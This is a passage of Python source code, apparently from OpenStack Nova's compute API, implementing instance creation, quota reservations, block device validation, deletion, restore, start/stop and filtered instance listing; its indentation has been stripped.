base_options.update(options_from_image)
# return the validated options and maximum number of instances allowed
# by the network quotas
return base_options, max_network_count
def _build_filter_properties(self, context, scheduler_hints, forced_host,
forced_node, instance_type, pci_request_info):
filter_properties = dict(scheduler_hints=scheduler_hints)
filter_properties['instance_type'] = instance_type
if forced_host:
filter_properties['force_hosts'] = [forced_host]
if forced_node:
filter_properties['force_nodes'] = [forced_node]
if pci_request_info and pci_request_info.requests:
filter_properties['pci_requests'] = pci_request_info
return filter_properties
def _provision_instances(self, context, instance_type, min_count,
max_count, base_options, boot_meta, security_groups,
block_device_mapping, shutdown_terminate,
instance_group, check_server_group_quota):
# Reserve quotas
num_instances, quotas = self._check_num_instances_quota(
context, instance_type, min_count, max_count)
LOG.debug("Going to run %s instances..." % num_instances)
instances = []
try:
for i in xrange(num_instances):
instance = objects.Instance()
instance.update(base_options)
instance = self.create_db_entry_for_new_instance(
context, instance_type, boot_meta, instance,
security_groups, block_device_mapping,
num_instances, i, shutdown_terminate)
pci_requests = base_options['pci_request_info']
pci_requests.instance_uuid = instance.uuid
pci_requests.save(context)
instances.append(instance)
if instance_group:
if check_server_group_quota:
count = QUOTAS.count(context,
'server_group_members',
instance_group,
context.user_id)
try:
QUOTAS.limit_check(context,
server_group_members=count + 1)
except exception.OverQuota:
msg = _("Quota exceeded, too many servers in "
"group")
raise exception.QuotaError(msg)
objects.InstanceGroup.add_members(context,
instance_group.uuid,
[instance.uuid])
# send a state update notification for the initial create to
# show it going from non-existent to BUILDING
notifications.send_update_with_states(context, instance, None,
vm_states.BUILDING, None, None, service="api")
# In the case of any exceptions, attempt DB cleanup and rollback the
# quota reservations.
except Exception:
with excutils.save_and_reraise_exception():
try:
for instance in instances:
try:
instance.destroy()
except exception.ObjectActionError:
pass
finally:
quotas.rollback()
# Commit the reservations
quotas.commit()
return instances
def _get_bdm_image_metadata(self, context, block_device_mapping,
legacy_bdm=True):
"""If we are booting from a volume, we need to get the
volume details from Cinder and make sure we pass the
metadata back accordingly.
"""
if not block_device_mapping:
return {}
for bdm in block_device_mapping:
if (legacy_bdm and
block_device.get_device_letter(
bdm.get('device_name', '')) != 'a'):
continue
elif not legacy_bdm and bdm.get('boot_index') != 0:
continue
if bdm.get('image_id'):
try:
image_id = bdm['image_id']
image_meta = self.image_api.get(context, image_id)
return image_meta
except Exception:
raise exception.InvalidBDMImage(id=image_id)
elif bdm.get('volume_id'):
try:
volume_id = bdm['volume_id']
volume = self.volume_api.get(context, volume_id)
except exception.CinderConnectionFailed:
raise
except Exception:
raise exception.InvalidBDMVolume(id=volume_id)
if not volume.get('bootable', True):
raise exception.InvalidBDMVolumeNotBootable(id=volume_id)
properties = volume.get('volume_image_metadata', {})
image_meta = {'properties': properties}
# NOTE(yjiang5): restore the basic attributes
image_meta['min_ram'] = properties.get('min_ram', 0)
image_meta['min_disk'] = properties.get('min_disk', 0)
image_meta['size'] = properties.get('size', 0)
# NOTE(yjiang5): Always set the image status as 'active'
# and depends on followed volume_api.check_attach() to
# verify it. This hack should be harmless with that check.
image_meta['status'] = 'active'
return image_meta
return {}
@staticmethod
def _get_requested_instance_group(context, scheduler_hints,
check_quota):
if not scheduler_hints:
return
group_hint = scheduler_hints.get('group')
if not group_hint:
return
if uuidutils.is_uuid_like(group_hint):
group = objects.InstanceGroup.get_by_uuid(context, group_hint)
else:
try:
group = objects.InstanceGroup.get_by_name(context, group_hint)
except exception.InstanceGroupNotFound:
# NOTE(russellb) If the group does not already exist, we need
# to automatically create it to be backwards compatible with
# old handling of the 'group' scheduler hint. The policy type
# will be 'legacy', indicating that this group was created to
# emulate legacy group behavior.
quotas = None
if check_quota:
quotas = objects.Quotas()
try:
quotas.reserve(context,
project_id=context.project_id,
user_id=context.user_id,
server_groups=1)
except nova.exception.OverQuota:
msg = _("Quota exceeded, too many server groups.")
raise nova.exception.QuotaError(msg)
group = objects.InstanceGroup(context)
group.name = group_hint
group.project_id = context.project_id
group.user_id = context.user_id
group.policies = ['legacy']
try:
group.create()
except Exception:
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
if quotas:
quotas.commit()
return group
def _create_instance(self, context, instance_type,
image_href, kernel_id, ramdisk_id,
min_count, max_count,
display_name, display_description,
key_name, key_data, security_groups,
availability_zone, user_data, metadata,
injected_files, admin_password,
access_ip_v4, access_ip_v6,
requested_networks, config_drive,
block_device_mapping, auto_disk_config,
reservation_id=None, scheduler_hints=None,
legacy_bdm=True, shutdown_terminate=False,
check_server_group_quota=False):
"""Verify all the input parameters regardless of the provisioning
strategy being performed and schedule the instance(s) for
creation.
"""
# Normalize and setup some parameters
if reservation_id is None:
reservation_id = utils.generate_uid('r')
security_groups = security_groups or ['default']
min_count = min_count or 1
max_count = max_count or min_count
block_device_mapping = block_device_mapping or []
if not instance_type:
instance_type = flavors.get_default_flavor()
if image_href:
image_id, boot_meta = self._get_image(context, image_href)
else:
image_id = None
boot_meta = self._get_bdm_image_metadata(
context, block_device_mapping, legacy_bdm)
self._check_auto_disk_config(image=boot_meta,
auto_disk_config=auto_disk_config)
handle_az = self._handle_availability_zone
availability_zone, forced_host, forced_node = handle_az(context,
availability_zone)
base_options, max_net_count = self._validate_and_build_base_options(
context,
instance_type, boot_meta, image_href, image_id, kernel_id,
ramdisk_id, display_name, display_description,
key_name, key_data, security_groups, availability_zone,
forced_host, user_data, metadata, injected_files, access_ip_v4,
access_ip_v6, requested_networks, config_drive,
block_device_mapping, auto_disk_config, reservation_id,
max_count)
# max_net_count is the maximum number of instances requested by the
# user adjusted for any network quota constraints, including
        # consideration of connections to each requested network
if max_net_count == 0:
raise exception.PortLimitExceeded()
elif max_net_count < max_count:
LOG.debug("max count reduced from %(max_count)d to "
"%(max_net_count)d due to network port quota",
{'max_count': max_count,
'max_net_count': max_net_count})
max_count = max_net_count
block_device_mapping = self._check_and_transform_bdm(
base_options, instance_type, boot_meta, min_count, max_count,
block_device_mapping, legacy_bdm)
instance_group = self._get_requested_instance_group(context,
scheduler_hints, check_server_group_quota)
instances = self._provision_instances(context, instance_type,
min_count, max_count, base_options, boot_meta, security_groups,
block_device_mapping, shutdown_terminate,
instance_group, check_server_group_quota)
filter_properties = self._build_filter_properties(context,
scheduler_hints, forced_host,
forced_node, instance_type,
base_options.get('pci_request_info'))
for instance in instances:
self._record_action_start(context, instance,
instance_actions.CREATE)
self.compute_task_api.build_instances(context,
instances=instances, image=boot_meta,
filter_properties=filter_properties,
admin_password=admin_password,
injected_files=injected_files,
requested_networks=requested_networks,
security_groups=security_groups,
block_device_mapping=block_device_mapping,
legacy_bdm=False)
return (instances, reservation_id)
@staticmethod
def _volume_size(instance_type, bdm):
size = bdm.get('volume_size')
if size is None and bdm.get('source_type') == 'blank':
if bdm.get('guest_format') == 'swap':
size = instance_type.get('swap', 0)
else:
size = instance_type.get('ephemeral_gb', 0)
return size
def _prepare_image_mapping(self, instance_type, mappings):
"""Extract and format blank devices from image mappings."""
prepared_mappings = []
for bdm in block_device.mappings_prepend_dev(mappings):
LOG.debug("Image bdm %s", bdm)
virtual_name = bdm['virtual']
if virtual_name == 'ami' or virtual_name == 'root':
continue
if not block_device.is_swap_or_ephemeral(virtual_name):
continue
guest_format = bdm.get('guest_format')
if virtual_name == 'swap':
guest_format = 'swap'
if not guest_format:
guest_format = CONF.default_ephemeral_format
values = block_device.BlockDeviceDict({
'device_name': bdm['device'],
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': guest_format,
'delete_on_termination': True,
'boot_index': -1})
values['volume_size'] = self._volume_size(
instance_type, values)
if values['volume_size'] == 0:
continue
prepared_mappings.append(values)
return prepared_mappings
def _update_block_device_mapping(self, elevated_context,
instance_type, instance_uuid,
block_device_mapping):
"""tell vm driver to attach volume at boot time by updating
BlockDeviceMapping
"""
LOG.debug("block_device_mapping %s", block_device_mapping,
instance_uuid=instance_uuid)
for bdm in block_device_mapping:
bdm['volume_size'] = self._volume_size(instance_type, bdm)
if bdm.get('volume_size') == 0:
continue
bdm['instance_uuid'] = instance_uuid
self.db.block_device_mapping_update_or_create(elevated_context,
bdm,
legacy=False)
def _validate_bdm(self, context, instance, instance_type, all_mappings):
def _subsequent_list(l):
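            # e.g. [0, 1, 2] -> True, [0, 2] -> False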
return all(el + 1 == l[i + 1] for i, el in enumerate(l[:-1]))
# Make sure that the boot indexes make sense
boot_indexes = sorted([bdm['boot_index']
for bdm in all_mappings
if bdm.get('boot_index') is not None
and bdm.get('boot_index') >= 0])
if 0 not in boot_indexes or not _subsequent_list(boot_indexes):
raise exception.InvalidBDMBootSequence()
for bdm in all_mappings:
# NOTE(vish): For now, just make sure the volumes are accessible.
# Additionally, check that the volume can be attached to this
# instance.
snapshot_id = bdm.get('snapshot_id')
volume_id = bdm.get('volume_id')
image_id = bdm.get('image_id')
if (image_id is not None and
image_id != instance.get('image_ref')):
try:
self._get_image(context, image_id)
except Exception:
raise exception.InvalidBDMImage(id=image_id)
if (bdm['source_type'] == 'image' and
bdm['destination_type'] == 'volume' and
not bdm['volume_size']):
raise exception.InvalidBDM(message=_("Images with "
"destination_type 'volume' need to have a non-zero "
"size specified"))
elif volume_id is not None:
try:
volume = self.volume_api.get(context, volume_id)
self.volume_api.check_attach(context,
volume,
instance=instance)
except (exception.CinderConnectionFailed,
exception.InvalidVolume):
raise
except Exception:
raise exception.InvalidBDMVolume(id=volume_id)
elif snapshot_id is not None:
try:
self.volume_api.get_snapshot(context, snapshot_id)
except exception.CinderConnectionFailed:
raise
except Exception:
raise exception.InvalidBDMSnapshot(id=snapshot_id)
ephemeral_size = sum(bdm.get('volume_size') or 0
for bdm in all_mappings
if block_device.new_format_is_ephemeral(bdm))
if ephemeral_size > instance_type['ephemeral_gb']:
raise exception.InvalidBDMEphemeralSize()
# There should be only one swap
swap_list = [bdm for bdm in all_mappings
if block_device.new_format_is_swap(bdm)]
if len(swap_list) > 1:
msg = _("More than one swap drive requested.")
raise exception.InvalidBDMFormat(details=msg)
if swap_list:
swap_size = swap_list[0].get('volume_size') or 0
if swap_size > instance_type['swap']:
raise exception.InvalidBDMSwapSize()
max_local = CONF.max_local_block_devices
if max_local >= 0:
num_local = len([bdm for bdm in all_mappings
if bdm.get('destination_type') == 'local'])
if num_local > max_local:
raise exception.InvalidBDMLocalsLimit()
def _populate_instance_names(self, instance, num_instances):
"""Populate instance display_name and hostname."""
display_name = instance.get('display_name')
if instance.obj_attr_is_set('hostname'):
hostname = instance.get('hostname')
else:
hostname = None
if display_name is None:
display_name = self._default_display_name(instance['uuid'])
instance.display_name = display_name
if hostname is None and num_instances == 1:
# NOTE(russellb) In the multi-instance case, we're going to
# overwrite the display_name using the
# multi_instance_display_name_template. We need the default
# display_name set so that it can be used in the template, though.
# Only set the hostname here if we're only creating one instance.
# Otherwise, it will be built after the template based
# display_name.
hostname = display_name
instance.hostname = utils.sanitize_hostname(hostname)
def _default_display_name(self, instance_uuid):
return "Server %s" % instance_uuid
def _populate_instance_for_create(self, context, instance, image,
index, security_groups, instance_type):
"""Build the beginning of a new instance."""
if not instance.obj_attr_is_set('uuid'):
# Generate the instance_uuid here so we can use it
# for additional setup before creating the DB entry.
instance['uuid'] = str(uuid.uuid4())
instance.launch_index = index
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SCHEDULING
info_cache = objects.InstanceInfoCache()
info_cache.instance_uuid = instance.uuid
info_cache.network_info = network_model.NetworkInfo()
instance.info_cache = info_cache
if CONF.ephemeral_storage_encryption.enabled:
instance.ephemeral_key_uuid = self.key_manager.create_key(
context,
length=CONF.ephemeral_storage_encryption.key_size)
else:
instance.ephemeral_key_uuid = None
# Store image properties so we can use them later
# (for notifications, etc). Only store what we can.
if not instance.obj_attr_is_set('system_metadata'):
instance.system_metadata = {}
# Make sure we have the dict form that we need for instance_update.
instance['system_metadata'] = utils.instance_sys_meta(instance)
system_meta = utils.get_system_metadata_from_image(
image, instance_type)
# In case we couldn't find any suitable base_image
system_meta.setdefault('image_base_image_ref', instance['image_ref'])
instance['system_metadata'].update(system_meta)
self.security_group_api.populate_security_groups(instance,
security_groups)
return instance
# NOTE(bcwaldon): No policy check since this is only used by scheduler and
# the compute api. That should probably be cleaned up, though.
def create_db_entry_for_new_instance(self, context, instance_type, image,
instance, security_group, block_device_mapping, num_instances,
index, shutdown_terminate=False):
"""Create an entry in the DB for this new instance,
including any related table updates (such as security group,
etc).
This is called by the scheduler after a location for the
instance has been determined.
"""
self._populate_instance_for_create(context, instance, image, index,
security_group, instance_type)
self._populate_instance_names(instance, num_instances)
instance.shutdown_terminate = shutdown_terminate
self.security_group_api.ensure_default(context)
instance.create(context)
if num_instances > 1:
# NOTE(russellb) We wait until this spot to handle
# multi_instance_display_name_template, because we need
# the UUID from the instance.
instance = self._apply_instance_name_template(context, instance,
index)
# NOTE (ndipanov): This can now raise exceptions but the instance
# has been created, so delete it and re-raise so
# that other cleanup can happen.
try:
self._validate_bdm(
context, instance, instance_type, block_device_mapping)
except (exception.CinderConnectionFailed, exception.InvalidBDM,
exception.InvalidVolume):
with excutils.save_and_reraise_exception():
instance.destroy(context)
self._update_block_device_mapping(
context, instance_type, instance['uuid'], block_device_mapping)
return instance
def _check_create_policies(self, context, availability_zone,
requested_networks, block_device_mapping):
"""Check policies for create()."""
target = {'project_id': context.project_id,
'user_id': context.user_id,
'availability_zone': availability_zone}
check_policy(context, 'create', target)
if requested_networks and len(requested_networks):
check_policy(context, 'create:attach_network', target)
if block_device_mapping:
check_policy(context, 'create:attach_volume', target)
def _check_multiple_instances_neutron_ports(self, requested_networks):
"""Check whether multiple instances are created from port id(s)."""
for requested_net in requested_networks:
if requested_net.port_id:
msg = _("Unable to launch multiple instances with"
" a single configured port ID. Please launch your"
" instance one by one with different ports.")
raise exception.MultiplePortsNotApplicable(reason=msg)
def _check_multiple_instances_and_specified_ip(self, requested_networks):
"""Check whether multiple instances are created with specified ip."""
for requested_net in requested_networks:
if requested_net.network_id and requested_net.address:
msg = _("max_count cannot be greater than 1 if an fixed_ip "
"is specified.")
raise exception.InvalidFixedIpAndMaxCountRequest(reason=msg)
@hooks.add_hook("create_instance")
def create(self, context, instance_type,
image_href, kernel_id=None, ramdisk_id=None,
min_count=None, max_count=None,
display_name=None, display_description=None,
key_name=None, key_data=None, security_group=None,
availability_zone=None, user_data=None, metadata=None,
injected_files=None, admin_password=None,
block_device_mapping=None, access_ip_v4=None,
access_ip_v6=None, requested_networks=None, config_drive=None,
auto_disk_config=None, scheduler_hints=None, legacy_bdm=True,
shutdown_terminate=False, check_server_group_quota=False):
"""Provision instances, sending instance information to the
scheduler. The scheduler will determine where the instance(s)
go and will handle creating the DB entries.
Returns a tuple of (instances, reservation_id)
"""
self._check_create_policies(context, availability_zone,
requested_networks, block_device_mapping)
if requested_networks and max_count > 1:
self._check_multiple_instances_and_specified_ip(requested_networks)
if utils.is_neutron():
self._check_multiple_instances_neutron_ports(
requested_networks)
return self._create_instance(
context, instance_type,
image_href, kernel_id, ramdisk_id,
min_count, max_count,
display_name, display_description,
key_name, key_data, security_group,
availability_zone, user_data, metadata,
injected_files, admin_password,
access_ip_v4, access_ip_v6,
requested_networks, config_drive,
block_device_mapping, auto_disk_config,
scheduler_hints=scheduler_hints,
legacy_bdm=legacy_bdm,
shutdown_terminate=shutdown_terminate,
check_server_group_quota=check_server_group_quota)
def trigger_provider_fw_rules_refresh(self, context):
"""Called when a rule is added/removed from a provider firewall."""
services = objects.ServiceList.get_all_by_topic(context,
CONF.compute_topic)
for service in services:
host_name = service.host
self.compute_rpcapi.refresh_provider_fw_rules(context, host_name)
@wrap_check_policy
def update(self, context, instance, **kwargs):
"""Updates the instance in the datastore.
:param context: The security context
:param instance: The instance to update
:param kwargs: All additional keyword args are treated
as data fields of the instance to be
updated
:returns: A reference to the updated instance
"""
refs = self._update(context, instance, **kwargs)
return refs[1]
def _update(self, context, instance, **kwargs):
# Update the instance record and send a state update notification
# if task or vm state changed
old_ref, instance_ref = self.db.instance_update_and_get_original(
context, instance['uuid'], kwargs)
notifications.send_update(context, old_ref,
instance_ref, service="api")
return dict(old_ref.iteritems()), dict(instance_ref.iteritems())
def _check_auto_disk_config(self, instance=None, image=None,
**extra_instance_updates):
auto_disk_config = extra_instance_updates.get("auto_disk_config")
if auto_disk_config is None:
return
if not image and not instance:
return
if image:
image_props = image.get("properties", {})
auto_disk_config_img = \
utils.get_auto_disk_config_from_image_props(image_props)
image_ref = image.get("id")
else:
sys_meta = utils.instance_sys_meta(instance)
image_ref = sys_meta.get('image_base_image_ref')
auto_disk_config_img = \
utils.get_auto_disk_config_from_instance(sys_meta=sys_meta)
self._ensure_auto_disk_config_is_valid(auto_disk_config_img,
auto_disk_config,
image_ref)
def _delete(self, context, instance, delete_type, cb, **instance_attrs):
if instance.disable_terminate:
LOG.info(_('instance termination disabled'),
instance=instance)
return
host = instance['host']
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
project_id, user_id = quotas_obj.ids_from_instance(context, instance)
        # In these states an instance has an associated snapshot.
if instance['vm_state'] in (vm_states.SHELVED,
vm_states.SHELVED_OFFLOADED):
snapshot_id = instance.system_metadata.get('shelved_image_id')
LOG.info(_("Working on deleting snapshot %s "
"from shelved instance..."),
snapshot_id, instance=instance)
try:
self.image_api.delete(context, snapshot_id)
except (exception.ImageNotFound,
exception.ImageNotAuthorized) as exc:
LOG.warning(_("Failed to delete snapshot "
"from shelved instance (%s)."),
exc.format_message(), instance=instance)
            except Exception:
                LOG.exception(_LE("Something went wrong when trying to "
                                  "delete a snapshot from a shelved instance."),
instance=instance)
original_task_state = instance.task_state
quotas = None
try:
# NOTE(maoy): no expected_task_state needs to be set
instance.update(instance_attrs)
instance.progress = 0
instance.save()
# NOTE(comstud): If we delete the instance locally, we'll
# commit the reservations here. Otherwise, the manager side
# will commit or rollback the reservations based on success.
quotas = self._create_reservations(context,
instance,
original_task_state,
project_id, user_id)
if self.cell_type == 'api':
# NOTE(comstud): If we're in the API cell, we need to
# skip all remaining logic and just call the callback,
# which will cause a cast to the child cell. Also,
# commit reservations here early until we have a better
# way to deal with quotas with cells.
cb(context, instance, bdms, reservations=None)
quotas.commit()
return
if not host:
try:
compute_utils.notify_about_instance_usage(
self.notifier, context, instance,
"%s.start" % delete_type)
instance.destroy()
compute_utils.notify_about_instance_usage(
self.notifier, context, instance,
"%s.end" % delete_type,
system_metadata=instance.system_metadata)
quotas.commit()
return
except exception.ObjectActionError:
instance.refresh()
if instance.vm_state == vm_states.RESIZED:
self._confirm_resize_on_deleting(context, instance)
is_up = False
try:
service = objects.Service.get_by_compute_host(
context.elevated(), instance.host)
if self.servicegroup_api.service_is_up(service):
is_up = True
if original_task_state in (task_states.DELETING,
task_states.SOFT_DELETING):
LOG.info(_('Instance is already in deleting state, '
'ignoring this request'), instance=instance)
quotas.rollback()
return
self._record_action_start(context, instance,
instance_actions.DELETE)
cb(context, instance, bdms,
reservations=quotas.reservations)
except exception.ComputeHostNotFound:
pass
if not is_up:
# If compute node isn't up, just delete from DB
self._local_delete(context, instance, bdms, delete_type, cb)
quotas.commit()
except exception.InstanceNotFound:
# NOTE(comstud): Race condition. Instance already gone.
if quotas:
quotas.rollback()
except Exception:
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
def _confirm_resize_on_deleting(self, context, instance):
# If in the middle of a resize, use confirm_resize to
# ensure the original instance is cleaned up too
migration = None
for status in ('finished', 'confirming'):
try:
migration = objects.Migration.get_by_instance_and_status(
context.elevated(), instance.uuid, status)
LOG.info(_('Found an unconfirmed migration during delete, '
'id: %(id)s, status: %(status)s') %
{'id': migration.id,
'status': migration.status},
context=context, instance=instance)
break
except exception.MigrationNotFoundByStatus:
pass
if not migration:
LOG.info(_('Instance may have been confirmed during delete'),
context=context, instance=instance)
return
src_host = migration.source_compute
# Call since this can race with the terminate_instance.
# The resize is done but awaiting confirmation/reversion,
# so there are two cases:
# 1. up-resize: here -instance['vcpus'/'memory_mb'] match
# the quota usages accounted for this instance,
# so no further quota adjustment is needed
# 2. down-resize: here -instance['vcpus'/'memory_mb'] are
# shy by delta(old, new) from the quota usages accounted
# for this instance, so we must adjust
try:
deltas = self._downsize_quota_delta(context, instance)
except KeyError:
LOG.info(_('Migration %s may have been confirmed during delete') %
migration.id, context=context, instance=instance)
return
quotas = self._reserve_quota_delta(context, deltas, instance)
self._record_action_start(context, instance,
instance_actions.CONFIRM_RESIZE)
self.compute_rpcapi.confirm_resize(context,
instance, migration,
src_host, quotas.reservations,
cast=False)
def _create_reservations(self, context, instance, original_task_state,
project_id, user_id):
instance_vcpus = instance.vcpus
instance_memory_mb = instance.memory_mb
# NOTE(wangpan): if the instance is resizing, and the resources
# are updated to new instance type, we should use
# the old instance type to create reservation.
# see https://bugs.launchpad.net/nova/+bug/1099729 for more details
if original_task_state in (task_states.RESIZE_MIGRATED,
task_states.RESIZE_FINISH):
try:
migration = objects.Migration.get_by_instance_and_status(
context.elevated(), instance.uuid, 'post-migrating')
except exception.MigrationNotFoundByStatus:
migration = None
if (migration and
instance.instance_type_id ==
migration.new_instance_type_id):
old_inst_type_id = migration.old_instance_type_id
try:
old_inst_type = flavors.get_flavor(old_inst_type_id)
except exception.FlavorNotFound:
LOG.warning(_("Flavor %d not found"), old_inst_type_id)
pass
else:
instance_vcpus = old_inst_type['vcpus']
vram_mb = int(old_inst_type.get('extra_specs',
{}).get(VIDEO_RAM, 0))
instance_memory_mb = (old_inst_type['memory_mb'] + vram_mb)
LOG.debug("going to delete a resizing instance",
instance=instance)
quotas = objects.Quotas(context)
quotas.reserve(context,
project_id=project_id,
user_id=user_id,
instances=-1,
cores=-instance_vcpus,
ram=-instance_memory_mb)
return quotas
def _local_delete(self, context, instance, bdms, delete_type, cb):
LOG.warning(_("instance's host %s is down, deleting from "
"database") % instance['host'], instance=instance)
instance.info_cache.delete()
compute_utils.notify_about_instance_usage(
self.notifier, context, instance, "%s.start" % delete_type)
elevated = context.elevated()
if self.cell_type != 'api':
self.network_api.deallocate_for_instance(elevated,
instance)
# cleanup volumes
for bdm in bdms:
if bdm.is_volume:
# NOTE(vish): We don't have access to correct volume
# connector info, so just pass a fake
# connector. This can be improved when we
# expose get_volume_connector to rpc.
connector = {'ip': '127.0.0.1', 'initiator': 'iqn.fake'}
try:
self.volume_api.terminate_connection(context,
bdm.volume_id,
connector)
self.volume_api.detach(elevated, bdm.volume_id)
if bdm.delete_on_termination:
self.volume_api.delete(context, bdm.volume_id)
except Exception as exc:
err_str = _("Ignoring volume cleanup failure due to %s")
LOG.warn(err_str % exc, instance=instance)
bdm.destroy(context)
cb(context, instance, bdms, local=True)
sys_meta = instance.system_metadata
instance.destroy()
compute_utils.notify_about_instance_usage(
self.notifier, context, instance, "%s.end" % delete_type,
system_metadata=sys_meta)
def _do_delete(self, context, instance, bdms, reservations=None,
local=False):
if local:
instance.vm_state = vm_states.DELETED
instance.task_state = None
instance.terminated_at = timeutils.utcnow()
instance.save()
else:
self.compute_rpcapi.terminate_instance(context, instance, bdms,
reservations=reservations)
def _do_soft_delete(self, context, instance, bdms, reservations=None,
local=False):
if local:
instance.vm_state = vm_states.SOFT_DELETED
instance.task_state = None
instance.terminated_at = timeutils.utcnow()
instance.save()
else:
self.compute_rpcapi.soft_delete_instance(context, instance,
reservations=reservations)
# NOTE(maoy): we allow delete to be called no matter what vm_state says.
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=None, task_state=None,
must_have_launched=True)
def soft_delete(self, context, instance):
"""Terminate an instance."""
LOG.debug('Going to try to soft delete instance',
instance=instance)
self._delete(context, instance, 'soft_delete', self._do_soft_delete,
task_state=task_states.SOFT_DELETING,
deleted_at=timeutils.utcnow())
def _delete_instance(self, context, instance):
self._delete(context, instance, 'delete', self._do_delete,
task_state=task_states.DELETING)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=None, task_state=None,
must_have_launched=False)
def delete(self, context, instance):
"""Terminate an instance."""
LOG.debug("Going to try to terminate instance", instance=instance)
self._delete_instance(context, instance)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.SOFT_DELETED])
def restore(self, context, instance):
"""Restore a previously deleted (but not reclaimed) instance."""
# Reserve quotas
flavor = instance.get_flavor()
num_instances, quotas = self._check_num_instances_quota(
context, flavor, 1, 1)
self._record_action_start(context, instance, instance_actions.RESTORE)
try:
if instance.host:
instance.task_state = task_states.RESTORING
instance.deleted_at = None
instance.save(expected_task_state=[None])
self.compute_rpcapi.restore_instance(context, instance)
else:
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.deleted_at = None
instance.save(expected_task_state=[None])
quotas.commit()
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback()
@wrap_check_policy
@check_instance_lock
@check_instance_state(must_have_launched=False)
def force_delete(self, context, instance):
"""Force delete an instance in any vm_state/task_state."""
self._delete_instance(context, instance)
def force_stop(self, context, instance, do_cast=True):
LOG.debug("Going to try to stop instance", instance=instance)
instance.task_state = task_states.POWERING_OFF
instance.progress = 0
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.STOP)
self.compute_rpcapi.stop_instance(context, instance, do_cast=do_cast)
@check_instance_lock
@check_instance_host
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.ERROR])
def stop(self, context, instance, do_cast=True):
"""Stop an instance."""
self.force_stop(context, instance, do_cast)
@check_instance_lock
@check_instance_host
@check_instance_cell
@check_instance_state(vm_state=[vm_states.STOPPED])
def start(self, context, instance):
"""Start an instance."""
LOG.debug("Going to try to start instance", instance=instance)
instance.task_state = task_states.POWERING_ON
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.START)
# TODO(yamahata): injected_files isn't supported right now.
# It is used only for osapi, not for the ec2 api.
# availability_zone isn't used by run_instance.
self.compute_rpcapi.start_instance(context, instance)
def get(self, context, instance_id, want_objects=False,
expected_attrs=None):
"""Get a single instance with the given instance_id."""
if not expected_attrs:
expected_attrs = []
expected_attrs.extend(['metadata', 'system_metadata',
'security_groups', 'info_cache'])
# NOTE(ameade): we still need to support integer ids for ec2
try:
if uuidutils.is_uuid_like(instance_id):
instance = objects.Instance.get_by_uuid(
context, instance_id, expected_attrs=expected_attrs)
elif utils.is_int_like(instance_id):
instance = objects.Instance.get_by_id(
context, instance_id, expected_attrs=expected_attrs)
else:
raise exception.InstanceNotFound(instance_id=instance_id)
except exception.InvalidID:
raise exception.InstanceNotFound(instance_id=instance_id)
check_policy(context, 'get', instance)
if not want_objects:
instance = obj_base.obj_to_primitive(instance)
return instance
def get_all(self, context, search_opts=None, sort_key='created_at',
sort_dir='desc', limit=None, marker=None, want_objects=False,
expected_attrs=None):
"""Get all instances filtered by one of the given parameters.
If there is no filter and the context is an admin, it will retrieve
all instances in the system.
Deleted instances will be returned by default, unless there is a
search option that says otherwise.
The results will be returned sorted in the order specified by the
'sort_dir' parameter using the key specified in the 'sort_key'
parameter.
"""
# TODO(bcwaldon): determine the best argument for target here
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
check_policy(context, "get_all", target)
if search_opts is None:
search_opts = {}
LOG.debug("Searching by: %s" % str(search_opts))
# Fixups for the DB call
filters = {}
def _remap_flavor_filter(flavor_id):
flavor = objects.Flavor.get_by_flavor_id(context, flavor_id)
filters['instance_type_id'] = flavor.id
def _remap_fixed_ip_filter(fixed_ip):
# Turn fixed_ip into a regexp match. Since '.' matches
# any character, we need to use regexp escaping for it.
filters['ip'] = '^%s$' % fixed_ip.replace('.', '\\.')
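# For example (illustrative value): a fixed_ip of '10.0.0.1' becomes the
# filter regexp '^10\.0\.0\.1$', so only exact matches on that address
# pass the DB-side 'ip' filter.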
def _remap_metadata_filter(metadata):
filters['metadata'] = jsonutils.loads(metadata)
def _remap_system_metadata_filter(metadata):
filters['system_metadata'] = jsonutils.loads(metadata)
# search_option to filter_name mapping.
filter_mapping = {
'image': 'image_ref',
'name': 'display_name',
'tenant_id': 'project_id',
'flavor': _remap_flavor_filter,
'fixed_ip': _remap_fixed_ip_filter,
'metadata': _remap_metadata_filter,
'system_metadata': _remap_system_metadata_filter}
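# Rough example of the remapping below (hypothetical search options):
# search_opts = {'name': 'web', 'flavor': '42', 'power_state': 1}
# - 'name' is a plain rename, so filters['display_name'] = 'web'
# - 'flavor' calls _remap_flavor_filter, which looks up the flavor with
#   flavor_id '42' and sets filters['instance_type_id']
# - 'power_state' has no mapping entry, so it is copied through as-is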
# copy from search_opts, doing various remappings as necessary
for opt, value in search_opts.iteritems():
# Do remappings.
# Values not in the filter_mapping table are copied as-is.
# If remapping is None, option is not copied
# If the remapping is a string, it is the filter_name to use
try:
remap_object = filter_mapping[opt]
except KeyError:
filters[opt] = value
else:
# Remaps are strings to translate to, or functions to call
# to do the translating as defined by the table above.
if isinstance(remap_object, six.string_types):
filters[remap_object] = value
else:
try:
remap_object(value)
# We already know we can't match the filter, so
# return an empty list
except ValueError:
return []
inst_models = self._get_instances_by_filters(context, filters,
sort_key, sort_dir, limit=limit, marker=marker,
expected_attrs=expected_attrs)
if want_objects:
return inst_models
# Convert the models to dictionaries
instances = []
for inst_model in inst_models:
instances.append(obj_base.obj_to_primitive(inst_model))
return instances
def _get_instances_by_filters(self, context, filters,
sort_key, sort_dir,
limit=None,
marker=None, expected_attrs=None):
if 'ip6' in filters or 'ip' in filters:
res = self.network_api.get_instance_uuids_by_ip_filter(context,
filters)
# NOTE(jkoelker) It is possible that we will get the same
# instance uuid twice (one for ipv4 and ipv6)
uuids = set([r['instance_uuid'] for r in res])
filters['uuid'] = uuids
fields = ['metadata', 'system_metadata', 'info_cache',
'security_groups']
if expected_attrs:
